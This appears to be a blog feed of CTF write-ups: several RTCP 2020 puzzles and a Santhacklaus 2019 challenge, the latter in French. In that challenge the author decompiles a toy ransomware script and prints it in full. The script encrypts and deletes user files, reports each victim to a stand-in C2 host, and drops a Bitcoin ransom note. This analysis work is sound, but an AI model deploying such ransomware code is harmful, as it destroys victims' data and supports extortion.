Oh, you want to know what my cat looks like …</code></pre></div><p><em>solves : 38</em></p>
<div class="highlight"><pre><span></span><code>Point : 200
It appears that my cat has gotten itself stuck in a tree... It's really tall and I can't seem to reach it. Maybe you can throw a snake at the tree to find it?
Oh, you want to know what my cat looks like? I put a picture in the hints.
</code></pre></div>
<p>We got a 7z archive. Let's unpack it!</p>
<div class="highlight"><pre><span></span><code>$ 7z e treemycatisin.7z
<span class="m">7</span>-Zip <span class="o">[</span><span class="m">64</span><span class="o">]</span> <span class="m">16</span>.02 : Copyright <span class="o">(</span>c<span class="o">)</span> <span class="m">1999</span>-2016 Igor Pavlov : <span class="m">2016</span>-05-21
p7zip Version <span class="m">16</span>.02 <span class="o">(</span><span class="nv">locale</span><span class="o">=</span>fr_FR.UTF-8,Utf16<span class="o">=</span>on,HugeFiles<span class="o">=</span>on,64 bits,8 CPUs Intel<span class="o">(</span>R<span class="o">)</span> Core<span class="o">(</span>TM<span class="o">)</span> i7-8550U CPU @ <span class="m">1</span>.80GHz <span class="o">(</span>806EA<span class="o">)</span>,ASM,AES-NI<span class="o">)</span>
Scanning the drive <span class="k">for</span> archives:
<span class="m">1</span> file, <span class="m">266897</span> bytes <span class="o">(</span><span class="m">261</span> KiB<span class="o">)</span>
Extracting archive: treemycatisin.7z
--
<span class="nv">Path</span> <span class="o">=</span> treemycatisin.7z
<span class="nv">Type</span> <span class="o">=</span> 7z
Physical <span class="nv">Size</span> <span class="o">=</span> <span class="m">266897</span>
Headers <span class="nv">Size</span> <span class="o">=</span> <span class="m">261108</span>
<span class="nv">Method</span> <span class="o">=</span> LZMA2:3m
<span class="nv">Solid</span> <span class="o">=</span> +
<span class="nv">Blocks</span> <span class="o">=</span> <span class="m">1</span>
Everything is Ok
Folders: <span class="m">27848</span>
Files: <span class="m">1337</span>
Size: <span class="m">2146274</span>
Compressed: <span class="m">266897</span>
</code></pre></div>
<p>We have a bunch of folder and files. It will be impossible to go through all of it.</p>
<div class="highlight"><pre><span></span><code>$ ls -al
total <span class="m">5348</span>
drwxr-xr-x <span class="m">27849</span> nlegall nlegall <span class="m">583720</span> janv. <span class="m">27</span> <span class="m">19</span>:30 .
drwxr-xr-x <span class="m">3</span> nlegall nlegall <span class="m">160</span> janv. <span class="m">27</span> <span class="m">19</span>:28 ..
drwx------ <span class="m">2</span> nlegall nlegall <span class="m">40</span> sept. <span class="m">19</span> <span class="m">18</span>:23 003Q6
drwx------ <span class="m">2</span> nlegall nlegall <span class="m">40</span> sept. <span class="m">19</span> <span class="m">18</span>:23 004P77DAN
drwx------ <span class="m">2</span> nlegall nlegall <span class="m">40</span> sept. <span class="m">19</span> <span class="m">18</span>:23 007CXMN
<span class="o">[</span>...<span class="o">]</span>
drwx------ <span class="m">2</span> nlegall nlegall <span class="m">40</span> sept. <span class="m">19</span> <span class="m">18</span>:23 ZZXJO9L
drwx------ <span class="m">2</span> nlegall nlegall <span class="m">40</span> sept. <span class="m">19</span> <span class="m">18</span>:23 ZZYSGJ8
drwx------ <span class="m">2</span> nlegall nlegall <span class="m">40</span> sept. <span class="m">19</span> <span class="m">18</span>:23 ZZZGZF3L
</code></pre></div>
<p>The <code>find</code> command is your best friend in this case. The only files are <code>.jpg</code> files. Let's find them all and try to check the size for each. For better understandable, we can <code>sort</code> and <code>uniq</code> to count how many time each file size occur.</p>
<div class="highlight"><pre><span></span><code>$ find . -name <span class="s2">"*.jpg"</span> -exec ls -ld <span class="o">{}</span> <span class="se">\;</span> <span class="p">|</span> awk <span class="s1">'{print $5}'</span> <span class="p">|</span> sort -n <span class="p">|</span> uniq -c
<span class="m">681</span> <span class="m">1496</span>
<span class="m">655</span> <span class="m">1718</span>
<span class="m">1</span> <span class="m">2208</span>
$ find . -name <span class="s2">"*.jpg"</span> -exec ls -ld <span class="o">{}</span> <span class="se">\;</span> <span class="p">|</span> grep <span class="m">2208</span>
-rw-r--r-- <span class="m">1</span> nlegall nlegall <span class="m">2208</span> sept. <span class="m">19</span> <span class="m">19</span>:20 ./ENP92.jpg
</code></pre></div>
<p>Hum, only one presents a size of <code>2208</code>.</p>
<p><img alt="ENP92.jpg" src="https://blog.nlegall.fr/images/rtcp/ENP92.jpg"></p>
<p>Let's write down the image and got the flag : <code>rtcp{meow_sharp_pidgion_rice_tree}</code>.</p>RTCP - Uwu?2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-uwu.html<p><em>solves : 401</em></p>
<div class="highlight"><pre><span></span><code>Point : 125
ᵘʷᵘ oh no ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ hecc sorry guys ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ sorry im dropping ᵘʷᵘ my uwus all over the ᵘʷᵘ place ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ oh no I lost one ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ …</code></pre></div><p><em>solves : 401</em></p>
<div class="highlight"><pre><span></span><code>Point : 125
ᵘʷᵘ oh no ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ hecc sorry guys ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ sorry im dropping ᵘʷᵘ my uwus all over the ᵘʷᵘ place ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ oh no I lost one ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ ᵘʷᵘ
ah, Jake, you idiot
Hint: https://riceteacatpanda.wtf/uwu
Hint 2: This challenge gets progressively harder the faster your internet is if you do it manually
</code></pre></div>
<p>We got the visit the link and got a bunch of redirections (5 in total). It's coming from a HTML redirect : <code><meta http-equiv="Refresh" content="0; url=/omgmeow" /></code>.</p>
<ul>
<li>https://riceteacatpanda.wtf/uwu</li>
<li>https://riceteacatpanda.wtf/omgmeow</li>
<li>https://riceteacatpanda.wtf/pandaaaaaaa</li>
<li>https://riceteacatpanda.wtf/you-better-wash-your-rice</li>
<li>https://riceteacatpanda.wtf/footprint</li>
<li>https://riceteacatpanda.wtf/uwustorage</li>
</ul>
<p>We have different ways to do it.</p>
<h2>From the web browser</h2>
<p>We can use the developper tools inside the web browser to log all requests make. For each requests, we can look inside the response and check with CTRL+F if the content contains the flag.</p>
<p><img alt="uwu.png" src="https://blog.nlegall.fr/images/rtcp/uwu.png"></p>
<h2>CLI</h2>
<p>We can url each page to check if the flag is inside and get the next page to check.</p>
<div class="highlight"><pre><span></span><code>$ curl -s https://riceteacatpanda.wtf/uwu <span class="p">|</span> grep -i rtcp
$ curl -s https://riceteacatpanda.wtf/uwu <span class="p">|</span> grep -i Refresh
<p><meta http-equiv<span class="o">=</span><span class="s2">"Refresh"</span> <span class="nv">content</span><span class="o">=</span><span class="s2">"0; url=/omgmeow"</span> />
$ curl -s https://riceteacatpanda.wtf/omgmeow <span class="p">|</span> grep -i rtcp
$ curl -s https://riceteacatpanda.wtf/omgmeow <span class="p">|</span> grep -i Refresh
<p><meta http-equiv<span class="o">=</span><span class="s2">"Refresh"</span> <span class="nv">content</span><span class="o">=</span><span class="s2">"0; url=/pandaaaaaaa"</span> />
$ curl -s https://riceteacatpanda.wtf/pandaaaaaaa <span class="p">|</span> grep -i rtcp
$ curl -s https://riceteacatpanda.wtf/pandaaaaaaa <span class="p">|</span> grep -i Refresh
<p><meta http-equiv<span class="o">=</span><span class="s2">"Refresh"</span> <span class="nv">content</span><span class="o">=</span><span class="s2">"0; url=/you-better-wash-your-rice"</span> />
$ curl -s https://riceteacatpanda.wtf/you-better-wash-your-rice <span class="p">|</span> grep -i rtcp
uWu uWu UWU UʷU uWu<span class="o">[</span>...<span class="o">]</span>rtcp<span class="o">{</span>uwu_,_1_f0und_y0u<span class="o">}[</span>...<span class="o">]</span>UʷU uWu ᵘWᵘ</p>
</code></pre></div>
<h2>BURP</h2>
<p>to-do</p>RTCP - Web Invaders2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-web-invaders.html<p><em>solves : 38</em></p>
<div class="highlight"><pre><span></span><code>Point : 250
https://jef1056.github.io/
</code></pre></div>
<p>It's a web game using <a href="https://defold.com/">Defold</a> like the mythic <a href="https://en.wikipedia.org/wiki/Space_Invaders">Space Invaders</a>. You can try to beat the first level but, even with this achivement, the flag will not appear.</p>
<p>Let's try to inspect all the files downloaded during the game loading :</p>
<p><img alt="webinvaders.png" src="https://blog.nlegall.fr/images/rtcp/webinvaders.png"></p>
<p>You …</p><p><em>solves : 38</em></p>
<div class="highlight"><pre><span></span><code>Point : 250
https://jef1056.github.io/
</code></pre></div>
<p>It's a web game using <a href="https://defold.com/">Defold</a> like the mythic <a href="https://en.wikipedia.org/wiki/Space_Invaders">Space Invaders</a>. You can try to beat the first level but, even with this achivement, the flag will not appear.</p>
<p>Let's try to inspect all the files downloaded during the game loading :</p>
<p><img alt="webinvaders.png" src="https://blog.nlegall.fr/images/rtcp/webinvaders.png"></p>
<p>You can use save the page from the browser to <code>wget</code>/<code>curl</code> each file. Let's take the <code>game.arcd0</code> who is the biggest game file:</p>
<div class="highlight"><pre><span></span><code>$ strings game.arcd0 <span class="p">|</span> grep -i rtcp
rtcp<span class="o">{</span>web
$ strings game.arcd0 <span class="p">|</span> grep -i rtcp -C <span class="m">3</span>
sdfdsfsdf
messag
curtain
rtcp<span class="o">{</span>web
_h^ck3r_
<span class="m">0004212</span><span class="o">}</span>
B!/builtins/materials/gui.
</code></pre></div>
<p>And finally, we got the flag: <code>rtcp{web_h^ck3r_0004212}</code>.</p>RTCP - Work In Progress2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-work-in-progress.html<p><em>solves : 138</em></p>
<div class="highlight"><pre><span></span><code>Point : 400
I was asked to beta-test this game, but it's so incomplete, it's kind of doesn't even have a goal... The developer said there's a flag, though, so I guess I'll just leave you to it!
Hint: Have you ever played Skyrim …</code></pre></div><p><em>solves : 138</em></p>
<div class="highlight"><pre><span></span><code>Point : 400
I was asked to beta-test this game, but it's so incomplete, it's kind of doesn't even have a goal... The developer said there's a flag, though, so I guess I'll just leave you to it!
Hint: Have you ever played Skyrim? Well, you don't need a horse for this one.
</code></pre></div>
<p>Not like <a href="/rtcp-tea-clicker.html">Tea Clicker</a>, we can't get the flag using some tools to inspect the RAM. We need to find a way in the game.</p>
<p>If you go right, you will have some monsters to fight. But, they can't die. When the live gouge is empty, it will be start to fill it every hit. So, definitely not the good way.</p>
<p><img alt="wip1.png" src="https://blog.nlegall.fr/images/rtcp/wip1.png"></p>
<p>So, let's close and open again the game and go to the left. We face a huge wall.</p>
<p><img alt="wip2.png" src="https://blog.nlegall.fr/images/rtcp/wip2.png"></p>
<p>You can climb it with using jump and left key.</p>
<p><img alt="wip3.png" src="https://blog.nlegall.fr/images/rtcp/wip3.png"></p>
<p>When you reach the top, let you down until the flag shows up on the right upper corner:</p>
<p><img alt="wip4.png" src="https://blog.nlegall.fr/images/rtcp/wip4.png"></p>
<p>The flag is so: <code>rtcp{Th3_qu1ck_br0WN_^dv3nturEr_jump$_0v3r_ThE_l^zy_cL1ff}</code>.</p>RTCP - Wrong Way2020-01-25T00:00:00+01:002020-01-25T00:00:00+01:00nlegalltag:blog.nlegall.fr,2020-01-25:/rtcp-wrong-way.html<p><em>solves : 129</em></p>
<div class="highlight"><pre><span></span><code>Point : 150
Did you know that you've been going the wrong way entire time?
</code></pre></div>
<p>Hum, the name is the best hint to solve this challenge. We usually decode/decrypt during CTF but for this one, we need to encode!</p>
<p>However, since some …</p><p><em>solves : 129</em></p>
<div class="highlight"><pre><span></span><code>Point : 150
Did you know that you've been going the wrong way entire time?
</code></pre></div>
<p>Hum, the name is the best hint to solve this challenge. We usually decode/decrypt during CTF but for this one, we need to encode!</p>
<p>However, since some characters are not printable, we can use it directly within the CLI :</p>
<div class="highlight"><pre><span></span><code>$ <span class="nb">echo</span> <span class="s2">"E7Rq<G:Kǒ"</span> <span class="p">|</span> base64
RTdScTxHOkvHkgo
</code></pre></div>
<p>We can put the content in a file with vim and <code>cat</code> it after :</p>
<div class="highlight"><pre><span></span><code>$ cat a <span class="p">|</span> base64
RTcPUnEXPEcTEDpLAceS
</code></pre></div>
<p>The format need to be added : <code>rtcp{UnEXPEcTED_pLAceS}</code>.</p>Santhacklaus 2019 - Jacques ! Au secours !2019-12-31T00:00:00+01:002019-12-31T00:00:00+01:00nlegalltag:blog.nlegall.fr,2019-12-31:/santhacklaus-2019-jacques-au-secours.html<p><em>solves : 57</em></p>
<div class="highlight"><pre><span></span><code>One of our VIP clients, who wishes to remain anonymous, has apparently been hacked and all their important documents are now corrupted.
Can you help us recover the files? We found a strange piece of software that might have caused all of this.
MD5 of the file : ccaab91b06fc9a77f3b98d2b9164df8e …</code></pre></div><p><em>solves : 57</em></p>
<div class="highlight"><pre><span></span><code>One of our VIP clients, who wishes to remain anonymous, has apparently been hacked and all their important documents are now corrupted.
Can you help us recover the files? We found a strange piece of software that might have caused all of this.
MD5 of the file : ccaab91b06fc9a77f3b98d2b9164df8e
</code></pre></div>
<h2>Informations générales</h2>
<p>On récupère une archive. On peut donc facilement lister son contenu avec la commande <code>zipinfo</code> :</p>
<div class="highlight"><pre><span></span><code>$ zipinfo chall_files.zip
Archive: chall_files.zip
Zip file size: <span class="m">399799</span> bytes, number of entries: <span class="m">8</span>
drwx--- <span class="m">3</span>.1 fat <span class="m">0</span> bx stor <span class="m">19</span>-Dec-10 <span class="m">16</span>:44 chall_files/
drwx--- <span class="m">3</span>.1 fat <span class="m">0</span> bx stor <span class="m">19</span>-Dec-10 <span class="m">16</span>:37 chall_files/vacation pictures/
-rw-a-- <span class="m">3</span>.1 fat <span class="m">174736</span> bx defN <span class="m">19</span>-Dec-10 <span class="m">16</span>:31 chall_files/vacation pictures/DCIM-0533.jpg.hacked
-rw-a-- <span class="m">3</span>.1 fat <span class="m">74368</span> bx defN <span class="m">19</span>-Dec-10 <span class="m">16</span>:31 chall_files/vacation pictures/DCIM-0534.jpg.hacked
-rw-a-- <span class="m">3</span>.1 fat <span class="m">88176</span> bx defN <span class="m">19</span>-Dec-10 <span class="m">16</span>:31 chall_files/vacation pictures/DCIM-0535.jpg.hacked
-rw-a-- <span class="m">3</span>.1 fat <span class="m">58400</span> bx defN <span class="m">19</span>-Dec-10 <span class="m">16</span>:31 chall_files/vacation pictures/DCIM-0536.jpg.hacked
-rw-a-- <span class="m">3</span>.1 fat <span class="m">76</span> bx defN <span class="m">19</span>-Dec-10 <span class="m">16</span>:31 chall_files/vacation pictures/READ_THIS.txt
-rw-a-- <span class="m">3</span>.1 fat <span class="m">3804</span> bx defN <span class="m">19</span>-Dec-10 <span class="m">16</span>:41 chall_files/virus.cpython-37.pyc
<span class="m">8</span> files, <span class="m">399560</span> bytes uncompressed, <span class="m">398247</span> bytes compressed: <span class="m">0</span>.3%
</code></pre></div>
<p>Elle est composée des images chiffrées (la source doit contenir le flag) et d'un script python compilé (<code>virus.cpython-37.pyc</code>). Il faut cependant savoir que du code python compilé et non masqué est très facilement réversible. Ce n'est absolument pas une bonne idée de fournir la version compilée d'un programme en python car l'ensemble des sources peut facilement y être retrouvé.</p>
<h2>Récupération des sources</h2>
<p>La commande <code>uncompyle6</code> (<a href="https://pypi.org/project/uncompyle6/">https://pypi.org/project/uncompyle6/</a>) prend en charge l'ensemble des versions python (de la 1.0 à 3.8) et fonctionne très bien.</p>
<div class="highlight"><pre><span></span><code>$ uncompyle6 virus.cpython-37.pyc > virus.cpython-37.py
</code></pre></div>
<p>Elle nous permet d'avoir le code source suivant :</p>
<div class="highlight"><pre><span></span><code><span class="c1"># uncompyle6 version 3.6.1</span>
<span class="c1"># Python bytecode 3.7 (3394)</span>
<span class="c1"># Decompiled from: Python 3.8.1 (default, Dec 21 2019, 20:57:38) </span>
<span class="c1"># [GCC 9.2.0]</span>
<span class="c1"># Embedded file name: /mnt/c/Users/Mat/Documents/_CTF/Santhacklaus/2019/virus.py</span>
<span class="c1"># Size of source mod 2**32: 3473 bytes</span>
<span class="kn">from</span> <span class="nn">Crypto.Cipher</span> <span class="kn">import</span> <span class="n">AES</span>
<span class="kn">from</span> <span class="nn">Crypto.Random</span> <span class="kn">import</span> <span class="n">get_random_bytes</span>
<span class="kn">import</span> <span class="nn">hashlib</span><span class="o">,</span> <span class="nn">os</span><span class="o">,</span> <span class="nn">getpass</span><span class="o">,</span> <span class="nn">requests</span>
<span class="n">TARGET_DIR</span> <span class="o">=</span> <span class="s1">'C:</span><span class="se">\\</span><span class="s1">Users'</span>
<span class="n">C2_URL</span> <span class="o">=</span> <span class="s1">'https://c2.virus.com/'</span>
<span class="n">TARGETS</span> <span class="o">=</span> <span class="p">[</span><span class="s1">'Scott Farquhar'</span><span class="p">,</span> <span class="s1">'Lei Jun'</span><span class="p">,</span> <span class="s1">'Reid Hoffman'</span><span class="p">,</span> <span class="s1">'Zhou Qunfei'</span><span class="p">,</span> <span class="s1">'Jeff Bezos'</span><span class="p">,</span> <span class="s1">'Shiv Nadar'</span><span class="p">,</span> <span class="s1">'Simon Xie'</span><span class="p">,</span> <span class="s1">'Ma Huateng'</span><span class="p">,</span> <span class="s1">'Ralph Dommermuth'</span><span class="p">,</span> <span class="s1">'Barry Lam'</span><span class="p">,</span> <span class="s1">'Nathan Blecharczyk'</span><span class="p">,</span> <span class="s1">'Judy Faulkner'</span><span class="p">,</span> <span class="s1">'William Ding'</span><span class="p">,</span> <span class="s1">'Scott Cook'</span><span class="p">,</span> <span class="s1">'Gordon Moore'</span><span class="p">,</span> <span class="s1">'Marc Benioff'</span><span class="p">,</span> <span class="s1">'Michael Dell'</span><span class="p">,</span> <span class="s1">'Yusaku Maezawa'</span><span class="p">,</span> <span class="s1">'Yuri Milner'</span><span class="p">,</span> <span class="s1">'Bobby Murphy'</span><span class="p">,</span> <span class="s1">'Larry Page'</span><span class="p">,</span> <span class="s1">'Henry Samueli'</span><span class="p">,</span> <span class="s1">'Jack Ma'</span><span class="p">,</span> <span class="s1">'Jen-Hsun Huang'</span><span class="p">,</span> <span class="s1">'Jay Y. Lee'</span><span class="p">,</span> <span class="s1">'Joseph Tsai'</span><span class="p">,</span> <span class="s1">'Dietmar Hopp'</span><span class="p">,</span> <span class="s1">'Henry Nicholas, III.'</span><span class="p">,</span> <span class="s1">'Dustin Moskovitz'</span><span class="p">,</span> <span class="s1">'Mike Cannon-Brookes'</span><span class="p">,</span> <span class="s1">'Robert Miller'</span><span class="p">,</span> <span class="s1">'Bill Gates'</span><span class="p">,</span> <span class="s1">'Garrett Camp'</span><span class="p">,</span> <span class="s1">'Lin Xiucheng'</span><span class="p">,</span> <span class="s1">'Gil Shwed'</span><span class="p">,</span> <span class="s1">'Sergey Brin'</span><span class="p">,</span> <span class="s1">'Rishi Shah'</span><span class="p">,</span> <span class="s1">'Denise Coates'</span><span class="p">,</span> <span class="s1">'Zhang Fan'</span><span class="p">,</span> <span class="s1">'Michael Moritz'</span><span class="p">,</span> <span class="s1">'Robin Li'</span><span class="p">,</span> <span class="s1">'Andreas von Bechtolsheim'</span><span class="p">,</span> <span class="s1">'Brian Acton'</span><span class="p">,</span> <span class="s1">'Sean Parker'</span><span class="p">,</span> <span class="s1">'John Doerr'</span><span class="p">,</span> <span class="s1">'David Cheriton'</span><span class="p">,</span> <span class="s1">'Brian Chesky'</span><span class="p">,</span> <span class="s1">'Wang Laisheng'</span><span class="p">,</span> <span class="s1">'Jan Koum'</span><span class="p">,</span> <span class="s1">'Jack Sheerack'</span><span class="p">,</span> <span class="s1">'Terry Gou'</span><span class="p">,</span> <span class="s1">'Adam Neumann'</span><span class="p">,</span> <span class="s1">'James Goodnight'</span><span class="p">,</span> <span class="s1">'Larry Ellison'</span><span class="p">,</span> <span class="s1">'Wang Laichun'</span><span class="p">,</span> <span class="s1">'Masayoshi Son'</span><span class="p">,</span> <span class="s1">'Min Kao'</span><span class="p">,</span> <span class="s1">'Hiroshi Mikitani'</span><span class="p">,</span> <span class="s1">'Lee Kun-Hee'</span><span class="p">,</span> <span class="s1">'David Sun'</span><span class="p">,</span> <span class="s1">'Mark Scheinberg'</span><span class="p">,</span> <span class="s1">'Yeung Kin-man'</span><span class="p">,</span> <span class="s1">'John Tu'</span><span class="p">,</span> <span class="s1">'Teddy Sagi'</span><span class="p">,</span> <span class="s1">'Frank Wang'</span><span class="p">,</span> <span class="s1">'Robert Pera'</span><span class="p">,</span> <span class="s1">'Eric Schmidt'</span><span class="p">,</span> <span class="s1">'Wang Xing'</span><span class="p">,</span> <span class="s1">'Evan Spiegel'</span><span class="p">,</span> <span class="s1">'Travis Kalanick'</span><span class="p">,</span> <span class="s1">'Steve Ballmer'</span><span class="p">,</span> <span class="s1">'Mark Zuckerberg'</span><span class="p">,</span> <span class="s1">'Jason Chang'</span><span class="p">,</span> <span class="s1">'Lam Wai Ying'</span><span class="p">,</span> <span class="s1">'Romesh T. Wadhwani'</span><span class="p">,</span> <span class="s1">'Liu Qiangdong'</span><span class="p">,</span> <span class="s1">'Jim Breyer'</span><span class="p">,</span> <span class="s1">'Zhang Zhidong'</span><span class="p">,</span> <span class="s1">'Pierre Omidyar'</span><span class="p">,</span> <span class="s1">'Elon Musk'</span><span class="p">,</span> <span class="s1">'David Filo'</span><span class="p">,</span> <span class="s1">'Joe Gebbia'</span><span class="p">,</span> <span class="s1">'Jiang Bin'</span><span class="p">,</span> <span class="s1">'Pan Zhengmin'</span><span class="p">,</span> <span class="s1">'Douglas Leone'</span><span class="p">,</span> <span class="s1">'Hasso Plattner'</span><span class="p">,</span> <span class="s1">'Paul Allen'</span><span class="p">,</span> <span class="s1">'Meg Whitman'</span><span class="p">,</span> <span class="s1">'Azim Premji'</span><span class="p">,</span> <span class="s1">'Fu Liquan'</span><span class="p">,</span> <span class="s1">'Jeff Rothschild'</span><span class="p">,</span> <span class="s1">'John Sall'</span><span class="p">,</span> <span class="s1">'Kim Jung-Ju'</span><span class="p">,</span> <span class="s1">'David Duffield'</span><span class="p">,</span> <span class="s1">'Gabe Newell'</span><span class="p">,</span> <span class="s1">'Scott Lin'</span><span class="p">,</span> <span class="s1">'Eduardo Saverin'</span><span class="p">,</span> <span class="s1">'Jeffrey Skoll'</span><span class="p">,</span> <span class="s1">'Thomas Siebel'</span><span class="p">,</span> <span class="s1">'Kwon Hyuk-Bin'</span><span class="p">]</span>
<span class="k">def</span> <span class="nf">get_username</span><span class="p">():</span>
<span class="k">return</span> <span class="n">getpass</span><span class="o">.</span><span class="n">getuser</span><span class="p">()</span><span class="o">.</span><span class="n">encode</span><span class="p">()</span>
<span class="k">def</span> <span class="nf">xorbytes</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
<span class="k">assert</span> <span class="nb">len</span><span class="p">(</span><span class="n">a</span><span class="p">)</span> <span class="o">==</span> <span class="nb">len</span><span class="p">(</span><span class="n">b</span><span class="p">)</span>
<span class="n">res</span> <span class="o">=</span> <span class="s1">''</span>
<span class="k">for</span> <span class="n">c</span><span class="p">,</span> <span class="n">d</span> <span class="ow">in</span> <span class="nb">zip</span><span class="p">(</span><span class="n">a</span><span class="p">,</span> <span class="n">b</span><span class="p">):</span>
<span class="n">res</span> <span class="o">+=</span> <span class="nb">bytes</span><span class="p">([</span><span class="n">c</span> <span class="o">^</span> <span class="n">d</span><span class="p">])</span>
<span class="k">return</span> <span class="n">res</span>
<span class="k">def</span> <span class="nf">lock_file</span><span class="p">(</span><span class="n">path</span><span class="p">):</span>
<span class="n">username</span> <span class="o">=</span> <span class="n">get_username</span><span class="p">()</span>
<span class="n">hsh</span> <span class="o">=</span> <span class="n">hashlib</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="s1">'md5'</span><span class="p">)</span>
<span class="n">hsh</span><span class="o">.</span><span class="n">update</span><span class="p">(</span><span class="n">username</span><span class="p">)</span>
<span class="n">key</span> <span class="o">=</span> <span class="n">hsh</span><span class="o">.</span><span class="n">digest</span><span class="p">()</span>
<span class="n">cip</span> <span class="o">=</span> <span class="n">AES</span><span class="o">.</span><span class="n">new</span><span class="p">(</span><span class="n">key</span><span class="p">,</span> <span class="mi">1</span><span class="p">)</span>
<span class="n">iv</span> <span class="o">=</span> <span class="n">get_random_bytes</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span>
<span class="n">params</span> <span class="o">=</span> <span class="p">((</span><span class="s1">'target'</span><span class="p">,</span> <span class="n">username</span><span class="p">),</span> <span class="p">(</span><span class="s1">'path'</span><span class="p">,</span> <span class="n">path</span><span class="p">),</span> <span class="p">(</span><span class="s1">'iv'</span><span class="p">,</span> <span class="n">iv</span><span class="p">))</span>
<span class="n">requests</span><span class="o">.</span><span class="n">get</span><span class="p">(</span><span class="n">C2_URL</span><span class="p">,</span> <span class="n">params</span><span class="o">=</span><span class="n">params</span><span class="p">)</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">path</span><span class="p">,</span> <span class="s1">'rb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fi</span><span class="p">:</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">path</span> <span class="o">+</span> <span class="s1">'.hacked'</span><span class="p">,</span> <span class="s1">'wb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fo</span><span class="p">:</span>
<span class="n">block</span> <span class="o">=</span> <span class="n">fi</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span>
<span class="k">while</span> <span class="n">block</span><span class="p">:</span>
<span class="k">while</span> <span class="nb">len</span><span class="p">(</span><span class="n">block</span><span class="p">)</span> <span class="o"><</span> <span class="mi">16</span><span class="p">:</span>
<span class="n">block</span> <span class="o">+=</span> <span class="nb">bytes</span><span class="p">([</span><span class="mi">0</span><span class="p">])</span>
<span class="n">cipherblock</span> <span class="o">=</span> <span class="n">cip</span><span class="o">.</span><span class="n">encrypt</span><span class="p">(</span><span class="n">xorbytes</span><span class="p">(</span><span class="n">block</span><span class="p">,</span> <span class="n">iv</span><span class="p">))</span>
<span class="n">iv</span> <span class="o">=</span> <span class="n">cipherblock</span>
<span class="n">fo</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="n">cipherblock</span><span class="p">)</span>
<span class="n">block</span> <span class="o">=</span> <span class="n">fi</span><span class="o">.</span><span class="n">read</span><span class="p">(</span><span class="mi">16</span><span class="p">)</span>
<span class="n">os</span><span class="o">.</span><span class="n">unlink</span><span class="p">(</span><span class="n">path</span><span class="p">)</span>
<span class="k">def</span> <span class="nf">lock_files</span><span class="p">():</span>
<span class="n">username</span> <span class="o">=</span> <span class="n">get_username</span><span class="p">()</span>
<span class="k">if</span> <span class="n">username</span> <span class="ow">in</span> <span class="n">TARGETS</span><span class="p">:</span>
<span class="k">for</span> <span class="n">directory</span><span class="p">,</span> <span class="n">_</span><span class="p">,</span> <span class="n">filenames</span> <span class="ow">in</span> <span class="n">os</span><span class="o">.</span><span class="n">walk</span><span class="p">(</span><span class="n">TARGET_DIR</span><span class="p">):</span>
<span class="k">for</span> <span class="n">filename</span> <span class="ow">in</span> <span class="n">filenames</span><span class="p">:</span>
<span class="k">if</span> <span class="n">filename</span><span class="o">.</span><span class="n">endswith</span><span class="p">(</span><span class="s1">'.hacked'</span><span class="p">):</span>
<span class="k">continue</span>
<span class="n">fullpath</span> <span class="o">=</span> <span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">directory</span><span class="p">,</span> <span class="n">filename</span><span class="p">)</span>
<span class="nb">print</span><span class="p">(</span><span class="s1">'Encrypting'</span><span class="p">,</span> <span class="n">fullpath</span><span class="p">)</span>
<span class="n">lock_file</span><span class="p">(</span><span class="n">fullpath</span><span class="p">)</span>
<span class="k">with</span> <span class="nb">open</span><span class="p">(</span><span class="n">os</span><span class="o">.</span><span class="n">path</span><span class="o">.</span><span class="n">join</span><span class="p">(</span><span class="n">TARGET_DIR</span><span class="p">,</span> <span class="s1">'READ_THIS.txt'</span><span class="p">),</span> <span class="s1">'wb'</span><span class="p">)</span> <span class="k">as</span> <span class="n">fo</span><span class="p">:</span>
<span class="n">fo</span><span class="o">.</span><span class="n">write</span><span class="p">(</span><span class="s1">'We have hacked all your files. Buy 1 BTC and contact us at hacked@virus.com</span><span class="se">\n</span><span class="s1">'</span><span class="p">)</span>
<span class="k">if</span> <span class="vm">__name__</span> <span class="o">==</span> <span class="s1">'__main__'</span><span class="p">:</span>
<span class="n">lock_files</span><span class="p">()</span>
<span class="c1"># okay decompiling virus.cpython-37.pyc</span>
</code></pre></div>
<h2>Fonctionnement</h2>
<p>Afin de procéder au déchiffrement, il est nécessaire de comprendre comment les fichiers ont été chiffrés avant.</p>
<p>Le script vérifie que l'utilisateur courant est bien présent dans la liste des cible (<code>if username in TARGETS:</code>) avant de chiffrer l'ensemble des fichiers présents dans le dossier cible (<code>for directory, _, filenames in os.walk(TARGET_DIR):</code>). Il va alors chiffré l'ensemble du dossier <code>C:\Users</code> du poste. Pour chaque fichier présent, il le chiffre à l'aide de la fonction <code>def lock_file(path)</code>.</p>
